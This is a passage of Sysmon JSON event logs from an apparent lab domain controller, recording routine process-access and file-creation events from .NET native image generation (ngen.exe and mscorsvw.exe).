t.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7861,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:10.184\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04EA-5F25-0000-00102CD01100}\r\nTargetProcessId: 2540\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:10.184","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04EA-5F25-0000-00102CD01100}","TargetProcessId":"2540","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7862,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:10.200\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04EA-5F25-0000-00102CD01100}\r\nTargetProcessId: 2540\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:10.200","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04EA-5F25-0000-00102CD01100}","TargetProcessId":"2540","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7863,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:10.247\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D0-5F25-0000-0010EAFC1000}\r\nTargetProcessId: 644\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:10.247","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D0-5F25-0000-0010EAFC1000}","TargetProcessId":"644","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7864,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:10.247\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D0-5F25-0000-0010EAFC1000}\r\nTargetProcessId: 644\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:10.247","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D0-5F25-0000-0010EAFC1000}","TargetProcessId":"644","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7865,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:10.247\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04D0-5F25-0000-0010EAFC1000}\r\nTargetProcessId: 644\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:10.247","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04D0-5F25-0000-0010EAFC1000}","TargetProcessId":"644","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7866,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:10.512\r\nProcessGuid: {A837DB8D-04EA-5F25-0000-001039D41100}\r\nProcessId: 644\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\284-0\\System.Web.Entity.dll\r\nCreationUtcTime: 2020-08-01 06:00:10.512","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:10.512","ProcessGuid":"{A837DB8D-04EA-5F25-0000-001039D41100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\284-0\\System.Web.Entity.dll","CreationUtcTime":"2020-08-01 06:00:10.512","EventReceivedTime":"2020-08-01 06:00:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7867,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:10.559\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04EA-5F25-0000-00103ED91100}\r\nTargetProcessId: 3388\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:10.559","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04EA-5F25-0000-00103ED91100}","TargetProcessId":"3388","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7868,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:10.559\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04EA-5F25-0000-00103ED91100}\r\nTargetProcessId: 3388\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:10.559","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04EA-5F25-0000-00103ED91100}","TargetProcessId":"3388","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7869,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:10.559\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04EA-5F25-0000-00103ED91100}\r\nTargetProcessId: 3388\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:10.559","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04EA-5F25-0000-00103ED91100}","TargetProcessId":"3388","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
